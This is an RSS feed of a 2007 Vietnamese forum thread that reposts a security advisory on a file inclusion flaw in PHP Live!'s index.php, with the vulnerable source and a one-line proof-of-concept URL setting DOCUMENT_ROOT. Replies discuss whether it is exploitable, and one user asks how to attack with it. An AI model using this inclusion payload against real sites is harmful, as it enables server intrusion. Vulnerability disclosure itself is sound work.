<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Latest posts for the topic "osi codes - php live"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/list/13.hva</link>
		<description><![CDATA[Latest messages posted in the topic "osi codes - php live"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>osi codes - php live</title>
				<description><![CDATA[ From: Advisory_at_Aria-Security.Net, &lt;Advisory_at_Aria-Security.Net&gt;
Date: 23 Oct 2007 21:12:18 -0000
('binary' encoding is not supported, stored as-is) ________________________________

Aria-Security Team<span class="link"> http://Aria-Security.Net</span>
Persian Security Network
________________________________

Source Code:

&lt;?
    /*******************************************************
    * COPYRIGHT OSI CODES - PHP Live!
    *******************************************************/
    session_start() ;
    $l = "" ;
    // try to get cookie value first
    if ( isset( $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ) ) { $l = $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ; }
    if ( isset( $HTTP_GET_VARS['l'] ) ) { $l = $HTTP_GET_VARS['l'] ; }
    if ( isset( $HTTP_POST_VARS['l'] ) ) { $l = $HTTP_POST_VARS['l'] ; }

    if ( !file_exists( "./web/conf-init.php" ) )
    {
        HEADER( "location: setup/index.php" ) ;
        exit ;
    }
    include_once("./web/conf-init.php") ;
    if ( file_exists( "web/$l/$l-conf-init.php" ) && $l )
    include_once("./web/$l/$l-conf-init.php") ;
    include_once("$DOCUMENT_ROOT/API/Util_Error.php") ;
    include_once("$DOCUMENT_ROOT/system.php") ;
    include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
    include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;
    include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ;
    include_once("$DOCUMENT_ROOT/API/sql.php" ) ;
    include_once("$DOCUMENT_ROOT/API/Users/get.php") ;
    include_once("$DOCUMENT_ROOT/API/Users/update.php") ;
    include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ;
    include_once("$DOCUMENT_ROOT/API/ASP/get.php") ;
?&gt;

Affected file: Index.php
Poc:
/index.php?DOCUMENT_ROOT=file.txt ?
Credits: Aria-Security
The-0utl4w
Received on Oct 24 2007 ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/15546.hva#92867</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/15546.hva#92867</link>
				<pubDate><![CDATA[Thu, 25 Oct 2007 10:02:43]]> GMT</pubDate>
				<author><![CDATA[ zero_suto]]></author>
			</item>
			<item>
				<title>Re: osi codes - php live</title>
				<description><![CDATA[  Em vừa thấy bug này trên 1 số web nhưng trên milwOrm vẫn chưa công bố .Xin mọi người cho biết ý kiến .Hính như sources này ở tranh freshmeat thì phải .]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/15546.hva#92868</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/15546.hva#92868</link>
				<pubDate><![CDATA[Thu, 25 Oct 2007 10:09:28]]> GMT</pubDate>
				<author><![CDATA[ zero_suto]]></author>
			</item>
			<item>
				<title>Re: osi codes - php live</title>
				<description><![CDATA[ Đến nay lâu lắm rùi mà vẫn còn source bị dính PHP Included nhĩ ? :) hix !!]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/15546.hva#92993</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/15546.hva#92993</link>
				<pubDate><![CDATA[Thu, 25 Oct 2007 18:37:32]]> GMT</pubDate>
				<author><![CDATA[ hoahongtim]]></author>
			</item>
			<item>
				<title>Re: osi codes - php live</title>
				<description><![CDATA[ Nếu như trong file cont-init.php có định nghĩa biến DOCUMENT_ROOT thì đâu có lỗi included nữa? Và nếu có dính lỗi, thì biến này sẽ được khai báo là 1 đường dẫn chứ sao lại là file.txt được nhỉ?]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/15546.hva#93043</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/15546.hva#93043</link>
				<pubDate><![CDATA[Thu, 25 Oct 2007 22:17:11]]> GMT</pubDate>
				<author><![CDATA[ learn2hack]]></author>
			</item>
			<item>
				<title>Re: osi codes - php live</title>
				<description><![CDATA[ Cho phép em hỏi chút ạ!
Cái này dùng ra sao đây?
Cách tấn công như thế nào?
Mong các bậc trên giúp đỡ!
Thanks
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/list/15546.hva#98461</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/list/15546.hva#98461</link>
				<pubDate><![CDATA[Sun, 18 Nov 2007 15:30:45]]> GMT</pubDate>
				<author><![CDATA[ bonjovi288]]></author>
			</item>
	</channel>
</rss>
